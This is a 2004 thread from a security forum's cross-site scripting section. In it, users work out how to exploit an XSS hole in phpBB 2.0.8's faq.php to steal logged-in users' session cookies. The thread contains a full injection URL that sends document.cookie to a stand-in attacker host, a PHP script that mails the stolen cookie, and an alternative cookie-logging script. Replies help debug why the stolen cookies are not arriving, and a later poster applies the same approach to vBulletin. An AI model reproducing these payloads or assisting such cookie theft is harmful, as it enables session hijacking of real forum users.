Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
April 17, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 327
Members: 0
Total: 327
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cross-site scripting aka XSS -> XSS phpBB 2.0.8
Post new topic  Reply to topic View previous topic :: View next topic 
XSS phpBB 2.0.8
PostPosted: Sun Sep 19, 2004 12:34 am Reply with quote
Nicolas
Regular user
Regular user
 
Joined: Sep 19, 2004
Posts: 10




Hi All
Thx for your forum, it's very good Wink

I have a problem when I want exploit this advisorie:
http://www.waraxe.us/?modname=sa&id=034


I write this link:

Code:
http://www.sitevulnerable.com/forum/faq.php?faq%5b0%5d%5b0%5d=f00<script>document.location='www.site.com/code_evil.php?cookie='+window.document.cookie;</script>bar&faq%5b0%5d%5b1%5d=lOeil


and my code_evil.php is:
Code:
<?php

$cokie = $_GET['cookie'];
mail('email@hotmail.com', 'A New cookie', $cokie);

?>


But ,I'm loggued anc I clic on the link, but I don't receive my cookie
What's the problem please Idea
View user's profile Send private message
PostPosted: Sun Sep 19, 2004 2:33 am Reply with quote
Dark Dragon
Regular user
Regular user
 
Joined: Aug 26, 2004
Posts: 11




i don't like emailer scripts personnaly

id prefer


Code:

<?php
$fp = fopen('logger.txt','a'); // open to append
fwrite($fp, $_GET['cookie']."~~~~~~~~~"); // write the cookie information
fclose($fp);
?>


and logger.txt (chmodded 777)

_________________
Coding Support Central
View user's profile Send private message
PostPosted: Sun Sep 19, 2004 7:09 pm Reply with quote
Nicolas
Regular user
Regular user
 
Joined: Sep 19, 2004
Posts: 10




Thx for your script, it's nice methode Wink

But did you know why my script don't work ?
View user's profile Send private message
Re: XSS phpBB 2.0.8
PostPosted: Sun Sep 19, 2004 8:25 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Nicolas wrote:
Hi All
Thx for your forum, it's very good Wink

I have a problem when I want exploit this advisorie:
http://www.waraxe.us/?modname=sa&id=034


I write this link:

Code:
http://www.sitevulnerable.com/forum/faq.php?faq%5b0%5d%5b0%5d=f00<script>document.location='www.site.com/code_evil.php?cookie='+window.document.cookie;</script>bar&faq%5b0%5d%5b1%5d=lOeil


and my code_evil.php is:
Code:
<?php

$cokie = $_GET['cookie'];
mail('email@hotmail.com', 'A New cookie', $cokie);

?>


But ,I'm loggued anc I clic on the link, but I don't receive my cookie
What's the problem please Idea


You don't receive email at all, or you receive email without cookie?
If you don't get email at all, then there can be problem with spam
filters and it's related to server, in which you use "mail()" function.
I have encountered many servers, that are "banned" from hotmail.com
and mails are just not getting through ...
View user's profile Send private message Send e-mail Visit poster's website
aa
PostPosted: Mon Sep 20, 2004 8:45 pm Reply with quote
SteX
Advanced user
Advanced user
 
Joined: May 18, 2004
Posts: 181
Location: Serbia




Always check your Junk E-Mail.. Wink

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Wed Sep 22, 2004 3:23 pm Reply with quote
Nicolas
Regular user
Regular user
 
Joined: Sep 19, 2004
Posts: 10




I didn't receive emails and I thank again the problem is a filters problem not a code problem
The email to receive is hotmail
I will test with an other email
Thx for all
I will post my results Wink
View user's profile Send private message
PostPosted: Sun Jan 16, 2005 7:24 pm Reply with quote
Injector
Active user
Active user
 
Joined: Dec 29, 2004
Posts: 49




hey can anyone help me Im having the same problem I used the php script
which sends the cookie to your email address. I receive the cookie but its
empty though. what did i do wrong or do i have to add anything else?

I'm doing it on vbulletin using some exploit on [IMG tags
View user's profile Send private message
XSS phpBB 2.0.8
  www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.153 Seconds